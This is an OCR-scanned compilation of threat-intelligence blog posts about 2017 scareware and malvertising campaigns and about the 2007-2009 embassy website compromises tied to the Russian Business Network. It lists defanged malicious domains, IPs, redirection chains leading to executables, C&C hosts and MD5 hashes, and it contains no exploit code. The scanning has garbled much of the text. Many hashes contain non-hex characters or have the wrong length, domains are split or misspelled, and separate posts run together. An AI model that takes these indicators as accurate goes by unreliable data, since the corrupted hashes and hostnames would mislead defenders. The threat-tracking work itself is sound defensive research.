Historical OSINT - Massive Black Hat SEO Campaign, 
Spotted in the Wild, Serves Scareware - Part Two 

( 2017 - 01-05 10 : 22 ) 

In, a, cybercrime, ecosystem, dominated, by, fraudulent, 
propositions, cybercriminals, continue, actively, populating, 

their, botnet's, infected, population, further, spreading, 
malicious, software, further, earning, fraudulent, revenue, 

in, the, process, of, monetizing, access, to, malware-infected, 
hosts, largely, relying, on, the, utilization, of, an, 

affiliate-network, based, type, of, monetization, scheme. 

We've, recently, intercepted, a, currently, active, malicious, 
black, hat, SEO (search engine optimization), type, 

of, malicious, campaign, serving, malicious, software, to, 
unsuspecting, users, further, monetizing, access, to, 

malware-infected, hosts, largely, relying, on, the, utilization, 
of, an, affiliate-network, based, type, of, monetization, 

scheme. 

In, this, post, we'll, profile, the, campaign, provide, 
actionable, intelligence, on, the, infrastructure, behind it, 

and, discuss, in-depth, the, tactics, techniques, and, 
procedures, of, the, cybercriminals, behind, it. 

Related, malicious, domains, known, to, have, 
participated, in, the, campaign: 

hxxp://notice-of-u nreported-income-email.donatehalf.com 



hxxp://911-pictu res.jewishreference.com 
hxxp://911-pictures.clpakman91.com 
hxxp://9-l 1-quotes, miclweekpolitics.com 

Sample, URL, redirection, chain: 

hxxp://trivet.gmgroupenterprises.com/style.js - 72.29.67.237 

hxxp://trivet.g mg roupenterprises.com/? 
trivettrivetgmgroupenterprisescom.swf 

hxxp://vpizclutebygugol.xorg.pl/go/ - 193.203.99.111 

- hxxp://vpizclutebygugol.xorg.pl/go4/ 

- hxxp://http://free-checkpc.com/l/cl709f38e78s84y76u - 
193.169.12.5 

- hxxp://safe-fileshere.com/s/w58238e9a6clh76k73r/setup 
.exe- 193.169.12.5 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(193.203.99.111): 

MD5: b761960b60f2e5617b4cla2e303969ffl 
MD5: a27ae350b9cl29bl3749bl4e376a00b52 
MD5: aclbacl83faclc017cl60972efa65eb3c230 


MD5: bl323cl4c7elf6455701cl49621eclfb545 



MD5:Cl66767c8aa7a8eee0dl2a6d9646b3e8 


Once, executed, a, sample, malware (MD5: 
b761960b60f2e5617b4da2e303969ffl), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://bdx.xorg.pl - 193.203.99.111 

Once, executed, a, sample, malware (MD5: 
a27ae350b9d29bl3749bl4e376a00b52), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://vboxsvr.ovh.net 

hxxp://gwg.xorg.pl - 193.203.99.111 

Once, executed, a, sample, malware (MD5: 
adbad83fadc017d60972efa65eb3c230), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://vboxsvr.ovh.net 
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hxxp://htu.xorg.pl - 193.203.99.111 

Once, executed, a, sample, malware (MD5: 

bl323d4c7elf6455701d49621edfb545), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 



hxxp://htu.xorg.pl - 193.203.99.111 

Once, executed, a, sample, malware (MD5: 
Cl66767c8aa7a8eee0dl2a6d9646b3e8), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://bdx.xorg.pl - 193.203.99.111 

Sample, detection, rate, for, a, sample, malicious, 
executable: 

MD5: 7df300b01243a42b4ddff724999cd4f7 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://updatepcnow.com - 208.73.211.249 

hxxp://safe-updates.com - 50.63.202.54; 54.85.196.8 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(208.73.211.249): 

MD5: 940be22f37e30c90d9fded842c23b24d 

MD5: ef29c61908f678f313aa298343845175 

MD5: 47f5002a0b9d312f28822d92a3962c81 

MD5: ba83653117a6196d8b2a52fbl68b8142 

MD5: f29209flca6c4666207ea732clf32978 

Once, executed, a, sample, malware (MD5: 
940be22f37e30c90d9fded842c23b24d), phones, back. 



to, the, 

following, malicious, C &C, server, IPs: 

hxxp://softonic-analytics.net - 46.28.209.74 

hxxp://superscan.sd.en.softonic.com - 46.28.209.70 

hxxp://www.ledyazilim.com - 213.128.83.163 

Once, executed, a, sample, malware (MD5: 
ef29c61908f678f313aa298343845175), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://ksandrafashion.com - 208.73.211.173 
hxxp://www. Iafyeri.com 
hxxp://kul ppasur.com 

Once, executed, a, sample, malware (MD5: 
47f5002a0b9d312f28822d92a3962c81), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://ftuny.com/borders.php 

Once, executed, a sample, malware (MD5: 
ba83653117a6196d8b2a52fbl68b8142), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://mhc.ir - 82.99.218.195 
hxxp://naphooclub.com - 208.73.211.173 



hxxp://mdesigner.ir - 176.9.98.58 

Once, executed, a, sample, malware (MD5: 
f29209flca6c4666207ea732clf32978), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://ftu ny.com/borders.php 
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Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(50.63.202.54): MD5: 
45497b47a6df2f6216b4c4bebc572dd3 

MD5: d5585af92c512bec3009bl568c8d2f7d 

MD5: 08db02c9873c0534656901d5e9501f46 

MD5: 830b22b4a0520dlb46a493f03a6a0a66 

MD5: 5eelbfa766f367393782972718d4e82f 

Once, executed, a, sample, malware (MD5: 
45497b47a6df2f6216b4c4bebc572dd3), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://lordofthepings.ru - 173.254.236.159 
hxxp://poppylols.ru 
hxxp://ch uckboris.ru 
hxxp://kosherpig.xyz - 195.157.15.100 



Once, executed, a, sample, malware (MD5: 
d5585af92c512bec3009bl568c8d2f7d), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 173.254.236.159 

hxxp://yardnews.net - 104.154.95.49 

Once, executed, a, sample, malware (MD5: 
08db02c9873c0534656901d5e9501f46), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 173.254.236.159 

hxxp://musicbroke.net - 195.22.28.210 

Once, executed, a, sample, malware (MD5: 
830b22b4a0520dlb46a493f03a6a0a66), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 173.254.236.159 

Once, executed, a, sample, malware (MD5: 
5eelbfa766f367393782972718d4e82f), phones, back, 
to, the. 



following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 

hxxp://lordofthepings.ru - 173.254.236.159 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(54.85.196.8): 

MD5: 05288748ddccf2e5fedef5d9e8218fef 

MD5: 08936ff676b062a87182535bce23d901 

MD5: ea2b2ea5a0bf2b8f6403b2200e5747a7 

MD5: 8a7e330ad88dcb4ced3e5e843424f85f 

MD5: bf3d996376663feaea6031blll4eb714 

Related, malicious, domains, known, to, have, 
participated, in, the, campaign: 

hxxp://graveslll.net - 64.86.17.47 - Email: 
gertrudeedickens(g)text2 re.com 

hxxp://lend ingl0.com 

hxxp://ad riafin.com 

hxxp://7sevenseas.com 

hxxp://i ronins.com 
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hxxp://trdatasft.com 
hxxp://omeoq ka.cn 



hxxp://trustsh ield.cn 

hxxp://capide.cn 

hxxp://tds-soft.comewithus.cn 

hxxp://g raveslll.net 

hxxp://reversfor5.net 

hxxp://l imestee.net 

hxxp://iandiang.net 

hxxp://iangian.net 

hxxp://iimpopos.net 

hxxpV/ciarksi nfact.net 

Sample, URL, redirection, chain: 

hxxpV/checkvirus-zone.com - 64.86.16.7 - Emaii: 
gertrudeedickens(g)text2 re.com 

- hxxp://checkvirus-zone.com/?p = 

Sample, detection, rate, for, a, sample, malicious, 
executable: 

MD5: bl57106188c2debab5d2fl337c708e35 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://pencii-netwok.com/?act=fb &1 = 1 &2 = 0 &3= - 
204.11.56.48; 204.11.56.45; 209.222.14.3; 208.73.210.215; 

208.73.211.152; 204.13.160.107 



Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: 

MD5: 3c3346426923504571f81caffdac698d 

MD5:ad4244794693b41c775b324c4838982a 

MD5: 6649b79938fl9f7ec9d06b7ba8a7aa8e 

MD5: 0526944bfb43bl4d8f72fdl84cd8c259 

MD5: 29932b0cb61011ffc4834c3b7586d956 

Once, executed, a, sample, malware (MD5: 
3c3346426923504571f81caffdac698d), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://www.vancityprinters.com - 104.31.76.211 

hxxp://vancityprinters.com - 23.94.18.39 

hxxp://vinasonthanh.com - 123.30.109.9 

Once, executed, a, sample, malware (MD5: 
ad4244794693b41c775b324c4838982a), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://banboon.com - 204.11.56.48 

hxxp://bdb.com.my - 103.4.7.143 

hxxp://baulaung.org - 52.28.249.128 

Once, executed, a, sample, malware (MD5: 
6649b79938fl9f7ec9d06b7ba8a7aa8e), phones. 



back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://cubingapi.com - 204.11.56.48 

hxxp://error.cubingapi.com - 204.11.56.48 

Once, executed, a, sample, malware (MD5: 
0526944bfb43bl4d8f72fdl84cd8c259), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 
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hxxp://www.vancityprinters.com - 104.31.77.211 

hxxp://vancityprinters.com - 23.94.18.39 

hxxp://vinasonthanh.com - 123.30.109.9 

Once, executed, a, sample, malware (MD5: 
29932b0cb61011ffc4834c3b7586d956), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://vancityprinters.com - 23.94.18.39 

hxxp://vinasonthanh.com - 123.30.109.9 

hxxp://rms365x24.com - 166.78.145.90 

We'll, continue, monitoring, the, campaign, and, post, 
updates, as, soon, as, soon, as, new, developments. 


take, place. 



9 


Historical OSINT - Malicious Malvertising Campaign, 
Spotted at FoxNews, Serves Scareware 

(2017-01-05 11:19) 

In, a, cybercrime, ecosystem, dominated, by, fraudulent, 
propositions, cybercriminals, continue, actively, populating, 

their, botnet's, infected, population, with, hundreds, of, 
malicious, releases, successfully, generating, hundreds, of, 

thousands, of, fraudulent, revenue, while, populating, their, 
botnet's, infected, population, largely, relying, on, the, 

utilization, of, affiliate-network, based, type, of, monetizing, 
scheme. 

We've, recently, intercepted, a, currently, active, 
malvertising, campaign, affecting, FoxNews, successfully, en¬ 
ticing, users, into, executing, malicious, software, on, the, 
the, affected, PCs, with, the, cybercriminals, behind, it, 

successfully, earning, fraudulent, revenue, largely, relying, 
on, the, utilization, of, an, affiliate-network, based, type, of, 
monetizing, scheme. 

In, this, post, we'll, profile, the, campaign, provide, 
actionable, intelligence, on, the, infrastructure, behind, it, 

and, discuss, in-depth, the, tactics, techniques, and, 
procedures, of, the, cybercriminals, behind, it. 

Sample, URL, redirection, chain: 



hxxp://topprornooffer.corn/vsrn/index.htrnl - 85.17.254.158; 
69.43.161.174 

- hxxp://78.47.132.222/al2/index.php? 

url = http://truconv.com/?a = 125 &s=4al2 - (78.47.132.222) 

- hxxp://redirectclicks.com/?accs=845 &tid = 338 - 
69.172.201.153; 176.74.176.178; 64.95.64.194 

- hxxp://http://redirectclicks.com/?accs=845 &tid = 339 

Related, malicious, domains, known, to, have, 
participated, in, the, campaign: 

hxxp://truconv.com - 78.46.88.202 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(78.46.88.202): MD5: 
473e3615795609a091a2f2d3dlbe2d00 

MD5: 9e51c29682a6059b9b636db8bf7dcc25 

MD5: 08a50ebcaa471cd45b3561c33740136d 

MD5: e7d5f7a90ddfalfbe8dfce32d6e4alfl 

MD5: fcdd2790dd5bl898ef8ee29092dca757 

Once, executed, a, sample, malware (MD5: 
473e3615795609a091a2f2d3dlbe2d00), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://yaskiya.cyberfight.de - 78.46.88.202 



Once, executed, a, sample, malware (MD5: 
9e51c29682a6059b9b636db8bf7dcc25), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://cfgllllll.go.3322.org - 118.184.176.13 

hxxp://newsoft.kilu.org - 78.46.88.202 

hxxp://my webllllll.go.3322.org 

hxxp://35free.net - 5.61.39.56 

hxxp://newsoftl.go. 3322.org 

hxxp://newsoftll.go.3322.org 

Once, executed, a, sample, malware (MD5: 
08a50ebcaa471cd45b3561c33740136d), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://darthvader.dyndns.tv 
hxxp://wwwl2.subdomain.com - 78.46.88.202 
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Once, executed, a, sample, malware (MD5: 
e7d5f7a90ddfalfbe8dfce32d6e4alfl), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://tundeghanawork.co.gp - 78.46.88.202 



Once, executed, a, sample, malware (MD5: 
fcdd2790dd5bl898ef8ee29092dca757), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://newsoft.go.3322.org - 221.130.179.36 

hxxp://cfgllllll.go.3322.org - 118.184.176.13 

hxxp://newsoft.kilu.org - 78.46.88.202 

hxxp://users6.nofeehost.com - 67.208.91.110 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(69.172.201.153): 

MD5: C9ca43032633584ff2ae4e4d7442fl23 

MD5: a099766f448acd6b032345dfd8c5491d 

MD5: da39ccb40blc80775e0aa3ab7cefb4b0 

MD5: 85750b93319bd2cf57e445elb4850b08 

MD5: e521b31eb97d6d25e3dl65f2fe9ca3ba 

Once, executed, a, sample, malware (MD5: 
C9ca43032633584ff2ae4e4d7442fl23), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://os.tokoholapisa.com - 54.229.133.176 
hxxp://down2ioad.net - 69.172.201.153 



hxxp://cdn.download2013.net - 185.152.65.38 

Once, executed, a, sample, malware (MD5: 
a099766f448acd6b032345dfd8c5491d), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://chicostara.com - 91.142.252.26 
hxxp://suewyl I ie.com 

hxxp://dewpoint-eg.com - 195.157.15.100 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(176.74.176.178): 

MD5: 116d07294fb4b78190f44524145eb200 

MD5: f9e71f66e3aae789b245638a00b951a8 

MD5: Id6d4a64a9901985b8a005eal66df584 

MD5: acfala5f290c7dd4859b56b49be41038 

MD5: b63fd04a8cdf69fb7215a70ccd0aef27 

Once, executed, a, sample, malware (MD5: 
116d07294fb4b78190f44524145eb200), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://www.on86.com - 69.172.201.153 
hxxp://return.uk.uniregistry.com - 176.74.176.178 



Once, executed, a, sample, malware (MD5: 
f9e71f66e3aae789b245638a00b951a8), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://www.linkbyte.com - 69.172.201.153 

hxxp://return.uk.uniregistry.com - 176.74.176.178 

Once, executed, a, sample, malware (MD5: 
Id6d4a64a9901985b8a005eal66df584), phones, 
back, to, the, 
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following, malicious, C &C, server, IPs: 

hxxp://www.pnmchgameserver.com - 69.172.201.153 

hxxp://return.uk.uniregistry.com - 176.74.176.178 

Once, executed, a, sample, malware (MD5: 
acfala5f290c7dd4859b56b49be41038), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://www.97cln.com - 45.125.35.85 

hxxp://www.97wg.com - 69.172.201.153 

hxxp://return.uk.uniregistry.com - 176.74.176.178 

Once, executed, a, sample, malware (MD5: 
b63fd04a8cdf69fb7215a70ccd0aef27), phones, back, 
to, the, fol- 



lowing, malicious, C &C, server, IPs: 

hxxp://pajak.yogya.com - 69.172.201.153 
hxxp://www.yogya.com 

hxxp://return.uk.uniregistry.com - 176.74.176.178 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(64.95.64.194): MD5: 
7ca6214e3b75bclf7a41aef3267afc29 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs: 

hxxp://freshtravei.net - 184.168.221.36 

hxxp://experiencetravei.net - 217.174.248.145 

hxxp://freshyei iow.net 

hxxp://experienceyei iow.net 

hxxp://freshciose.net 

hxxp://experienceciose.net 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 

(69.43.161.174): 

MD5: 674fca39cafl8320e5a0e5fc45527ba4 
MD5: 7017a26b53bc0402475cl6b900a6c98ae 


MD5: 0b61f6clfaclclcll41a91c65c7f290b9358 



MD5:4d5bc6b69db093824aa905137850e883 


MD5: 201dee0da7b7807808d681510317ab59 

Once, executed, a, sample, malware (MD5: 
674fca39cafl8320e5a0e5fc45527ba4), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://aahydrogen.com - 208.73.210.214 

hxxp://g reatinstant.net 

hxxp://g insdirect.net 

hxxp://autoupioaders.net - 185.53.177.9 

Once, executed, a, sample, malware (MD5: 
7017a26b53bc0402475d6b900a6c98ae), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://w.wfetch.com - 69.43.161.174 

hxxp://wwl.w.wfetch.com - 72.52.4.90 

Once, executed, a, sample, malware (MD5: 
4d5bc6b69db093824aa905137850e883), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://greattaby.com - 69.43.161.174 
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hxxp://ww41.greattaby.com - 141.8.224.79 



Once, executed, a, sample, malware (MD5: 
201dee0da7b7807808d681510317ab59), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://layer-ads.de - 69.43.161.174 

Sample, URL, redirection, chain: 

hxxp://bonuspromooffer.com - 208.91.197.46; 141.8.226.14; 
204.11.56.45; 204.11.56.26; 208.73.210.215; 

208.73.211.246; 82.98.86.178 

- hxxp://promotion-offer.com/vsm/adv/5?a=cspvm-sst-ozbc- 
sst &l = 370 &f=cs_3506417142 &ex=l &ed = 2 &h = 

&sub=csp &prodabbr=3P _UVSM - 208.91.197.46; 
204.11.56.48; 204.11.56.45; 204.11.56.26; 63.156.206.202; 

63.149.176.12 

- hxxp://easywebchecklive.com/l/fileslist.js - 94.247.2.215 

- hxxp://78.47.132.222/a 12/index2.php 

- hxxp://78.47.132.221/al2/pdf.php?u = i 1 _0 

- hxxp://78.47.132.221/al2/aff _12.exe?u = i 1 _0 &spl=4 

Once, executed, a, sample, malware, phones, back, 
to, the, following, malicious, C &C, server, IPs 
(208.91.197.46): 

MD5: bl3flaf8fc426e350dfll565dcf281e8 


MD5: al89b3334fbd9cd357aedff22c672e9c 



MD5: da53b068538ff03e2fcl36c7d0816e39 


MD5:ec08a877817c749597396e6b34b88e78 
MD5: b9e7bf23de901280e62fd68090b5b8fa 

Once, executed, a, sample, malware (MD5: 
bl3flaf8fc426e350dfll565dcf281e8), phones, back, 
to, the, fol¬ 
lowing, malicious, C &C, server, IPs: 

hxxp://dtrack.sslsecurel.com - 193.166.255.171 

hxxp://staticrr.paleokits.net - 205.251.219.192 

hxxp://dtrack.seed ls.com 

hxxp://staticrr.sslsecu rel.com 

Once, executed, a, sample, malware (MD5: 
al89b3334fbd9cd357aedff22c672e9c), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://staticrr.paleokits.net - 54.230.11.231 

hxxp://staticrr.sslsecurel.com - 193.166.255.171 

hxxp://staticrr.sslsecure2.com 

hxxp://staticrr.sslsecure3.com - 208.91.197.46 

Once, executed, a, sample, malware (MD5: 
ec08a877817c749597396e6b34b88e78), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 



hxxp://sky worldent.com 

hxxp ://sol itai rei nfo.com 

hxxp://speedholidays.com - 206.221.179.26 

Once, executed, a, sample, malware (MD5: 
b9e7bf23de901280e62fd68090b5b8fa), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://api.v2.secdls.com 

hxxp://api.v2.sslsecurel.com - 193.166.255.171 

hxxp ://a pi. v2.sslsecure2.com 

hxxp://api.v2.sslsecure3.com - 208.91.197.46 
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Related, malicious MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs: MD5: 
969601cbf069a849197289e042792419 

We'll, continue, monitoring, the, campaign, and, post, 
updates, as, soon, as, new, developments, take, place. 
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Who’s Who in Cyber Crime for 

2007? - New Media Malware 

Gang 

• The Gang speaks out - “get lost” and die() 

• Dots dots dots 

• musicbox1.cn/iframe.php refreshes 
textdesk.com - refreshing Storm Worm 
domains - eliteproject.cn; takenames.cn; 
blOcker.info; space-sms.info 

• French government’s Lybia site hack 
assessment ends up to 208.72.168.176 - 
the gang’s main IP 


Historical OSINT - Inside the 2007-2009 Series of 
Cyber Attacks Against Multiple International 
Embassies 

(2017-05-29 08:28) 

Remember, the, [l]Russian, Business, Network, and, 
the. New, Media, Malware, Gang? 

It's, been, several, years, since, I, last, posted, an, update, 
regarding, the, group's, activities, including, the, di¬ 
rect, establishing, of, a, direct, connection, between, the, 

[2]Russian, Business, Network, the, [3]New, Media, 

Malware, gang, including, a, variety, of, high, profile, Web, 
site, compromise, campaigns. 



What's, particularly, interesting, about, the, group's, 
activities, is, the, fact, that, back, in, 2007, the, group's, 

activities, used, to, dominate, the, threat, landscape, in, a, 
targeted, fashion, including, the, active, utilization, of, 

client-side, exploits, and, the, active, exploitation, of, 
legitimate, Web, sites, successfully, positioning, the, group, 

including, the, Russian, Business, Network, as, a, leading, 
provider, of, malicious, activities, online, leading, to, a, 

series, of, analyses, successfully, detailing, the, activities, of, 
the, group, including, the, direct, establishing, of, a, 
connection, between, the. New, Media, Malware, Gang, the, 
Russian, Business, Network, and, the. Storm, Worm, botnet. 

In, this, post. I'll, provide, a, detailed, analysis, of, the, 
group's, activities, discuss, in, the, depth, the, tactics, 

techniques, and, procedures, (TTPs), of, the, group, including, 
a, direct, establishing, of, a, connection, between, the. 

New, Media, Malware, Gang, the, Russian, Business, Network, 
and, the, direct, compromise, of, a, series, of, high, 

profile, Web, site, compromise, campaigns. 

Having, successfully, tracked, down, and, profiled, the, 
group's, activities, for, a, period, of, several, years, and, 

based, on, the, actionable, intelligence, provided, regarding, 
the, group's, activities, we, can, easily, establish, a, 

direct, connection, between, the. New, Media, Malware, Gang, 
and, the, Russian, Business, Network, including, a. 
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series, of, high, profile, Web, site, compromise, campaigns. 

Key Summary Points: 

- RBN Connection, New Media Malware Gang connection -" ai 
siktir"' " DieO", money mule recruitment, money laundering of 
virtual currency 

- Actionable CYBERINT data to assist law enforcement, 
academics and the private sector in ongoing or past 
cybercrime 

investigations 

- Complete domain portfolios registered up to the present 
day using the same emails used to register the malicious 

domains during 2007-2009 to assist law enforcement, 
academics and the private sector in catching up with their 

malicious activities over the years 

- Detailed analysis of each and every campaign's domain 
portfolios (up to present day) further dissecting the 

fraudulent schemes launched by the same cybercriminals 
that embedded malware on the embassies' web sites 

- Complete IP Hosting History for each and every of the 
malicious domains/command and control servers during the 

time of the attack 

-The "Big Picture" detailing the inter-connections between 
the campaigns, with historical OSINT data pointing to the 

"New Media Malware Gang", back then customers of the 
Russian Business Network 



Let's, profile, the, group's, activities, including, a, direct, 
establishing, of, a, connection, between, the, Russian, 

Business, Network, the. New, Media, Malware, Gang, and, the. 
Storm, Worm, botnet. 

In, 2007, I, 

[4]profiled 

, the, direct, compromise, of, the, Syrian, Embassy, in, 

London, including, a, related, compromise of, the, [5]US- 

AID.gov compromised, malware and exploits served, 
the, [6]U.S Consulate St. Petersburg Serving Malware, 
[7]Bankof India Serving Malware, [8]French Embassy 
in Libya Serving Malware, [9]Ethiopian Embassy in 
Washington D.C 

Serving Malware, [10]Embassy of India in Spain 
Serving Malware, [ll]Azerbaijanian Embassies in 
Pakistan and Hungary Serving Malware, further, 
detailing, the, malicious, activities, of, the, Russian, Business, 
Network, and, the. New, Media, Malware, Gang. 

Let's profile, the, campaigns, and, discuss, in, depth, the, 
direct, connection, between, the, group's, activities, 

the, Russian, Business, Network, and, the. New, Media, 
Malware, Gang. 

sicil.info - on 2007-09-26 during the time of the attack, the 
domain was registered using the srvs4you(g)gmail.com 

email. The domain name first appeared online on 2006-06-10 
with an IP 213.186.33.24. On 2007-07-11, it changed 



IPs to 203.121.79.71, followed by another change on 2008- 
01-06 to 202.75.38.150, another change on 2008-05-06 

to 203.186.128.154, yet another change on 2008-05-18 to 
190.183.63.103, and yet another change on 2008-07-27 

to 190.183.63.56. 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(sicil.info): 

MD5: 4802db20da46fca2al896d4c983bl3ba 

MD5: f9434d86ef2959670b73a79947b0f4d2 

MD5: 32dba64ae55e7bb4850e27274da42dlb 

MD5: Cd6a7ff6388fbd94b7ee9cdc88ca8f4d 

MD5: 57dff9e8154189f0a09fb62450decac6 

Known, to, have, responded, to, the, same, 
malicious, C &C, server, IPs (sicil.info), are, also, the, 
following, 

malicious, domains: 

hxxp://144.217.69.62 

hxxp://63.246.128.71 
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hxxp://207.150.177.28 
hxxp://66.111.47.62 
hxxp://66.111.47.4 



hxxp://66.111.47.8 

Related, malicious, MD5s, known, to, have, 
responded, to, the, same, malicious, C &C, server, IPs 
(213.186.33.24): 

MD5: Ia08c0ce5abl5e6fd8f52cd99ea64acb 

MD5:95cc3a0243aa050243ab858794cld221 

MD5: cc63d67282789e03469f2e6520c6de80 

MD5: 3829506c454b86297d2828077589cbf8 

MD5: Iel8bl7149899d55d3625d47135a22a7 

Once, executed, a, sample, malware (MD5: 
Ia08c0ce5abl5e6fd8f52cd99ea64acb), phones, back, 
to, the, 

following, malicious, C &C, server, IPs: 

hxxp://ioasis.org - 208.112.115.36 

hxxp://polyhedrusgroup.com - 143.95.229.33 

hxxp://espoirsetvie.com - 213.186.33.24 

hxxp://ladiesdehaan.be - 185.59.17.113 

hxxp://chonburicoop.net - 27.254.96.151 

hxxp://ferienwohnung-walchensee-pur.de - 109.237.138.48 

Related posts: [12]Dissecting a Sample Russian 
Business Network (RBN) Contract/Agreement Through 
the 


Prism of RBN's AbdAllah Franchise 



Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(Oki.ru; 

89.179.174.156): 

MD5: Cd33ea55b2dl3df592663fl8e6426921 
MD5: 8e0c7757b82dl4b988afac075e8ed5dc 
MD5: e6aaafcafdd0a20d6dbe7f8c0bf4d012 
MD5: e513alb25e59670f777398894dfe41b6 
MD5: 0fad43c03d80aleb3a2clae9e9a6c9ed 
MD5: 6elb789f0df30ba0798fbc47cblceclc 
MD5: 9f02232ed0ee609c8dblb98325beaa94 

Once, executed, a, sample, malware (MD5: 
e6aaafcafdd0a20d6dbe7f8c0bf4d012), phones, back, 
to, the, fol¬ 
lowing, C &C, server, IPs: 

hxxp://lordofthepings.ru (173.254.236.159) 

hxxp://poppylols.ru 

hxxp://ch uckboris.ru 

hxxp://kosherpig.xyz 

hxxp://ladyhaha.xyz 

hxxp://porkhalal.site 

hxxp://ri ban nafap.site 



hxxp://bieberfans.top 
hxxp://runands.top 
hxxp://frontlive.net 
hxxp://offerl ive.net 
h XX p: //f ro n tse rve. n et 
h XX p: //off e rse rve. n et 
hxxp://hanghello.ru 
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hxxp://hang hello, net 
hxxp://septemberhel lo.net 
hxxp://hang mi ne.net 
hxxp://septembermi ne.net 
hxxp://hanglive.net 
hxxp://wrongserve.ru 
hxxp://wrongserve.net 
hxxp://madel ive.net 

Once, executed, a, sample, malware (MD5: 
e513alb25e59670f777398894dfe41b6), phones, 
back, to, the, 

following, malicious, C &C, server, IPs: 

hxxp://riddenstorm.net - 208.100.26.234 



hxxp://lordofthepings.ru - 173.254.236.159 

hxxp://yardl ive.ru 

hxxp://yardlive.net 

hxxp://musiclive.net - 141.8.225.124 

hxxp://yardserve.net 

hxxp://musicserve.net - 185.53.177.20 

hxxp://wenthel lo.net 

hxxp://spendhel lo.ru 

hxxp://wentmi ne.net 

hxxp://spend mi ne.net 

hxxp://spend heiio.net 

hxxp://joiniive.net 

hxxp://wentserve.ru 

hxxp://hang heiio.net 

hxxp://joinheiio.net 

hxxp://xl2345.org - 46.4.22.145 

Related, malicious, MD5s, known, to, have, phoned, 
back, to, the, same, malicious, C &C, server, IPs 
(miron555.org): MD5: 
0e423596c502cle28cce0c98df2a2b6d 


MD5: e75d92defbllafe50a8cc51dfe4fb6ee 



MD5: adcedd763f541e625f91030ee4de7cl9 


MD5: 2c664a4cl374b3d887f59599704aef6c 

MD5: 2c664a4cl374b3d887f59599704aef6c 

MD5: 0e423596c502cle28cce0c98df2a2b6d 

Over the years (up to present day) 
srvs4you@gmail.com is aiso known to have been used 
to register the foi- 

iowing domains: 

hxxp://10lan nlO.org 

hxxp://24cargo.net 

hxxp://ace-assist.biz 

hxxp://acti vation-confirm.com 

hxxp://ad woords.net 

hxxp://a lert-careerbuilder.com 

hxxp://annebehnert.info 

hxxp://apollo-services.net 

hxxp://appolage.org 

hxxp://auctions-u kash.com 
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hxxp://bbcfi nancenews.com 
hxxp://bestg reatoffers.org 



hxxp://blackbird-reg istration.com 
hxxp://bloomborg.biz 
hxxp://busi nessprocl.com 
hxxp://bussol utionsinc.org 
hxxp://caiisto-traci ing.com 
hxxp://caiisto-traci ing.net 
hxxp://caiisto-traci ing.org 
hxxp://canciy-cou ntry.com 
hxxp://casheq.com 
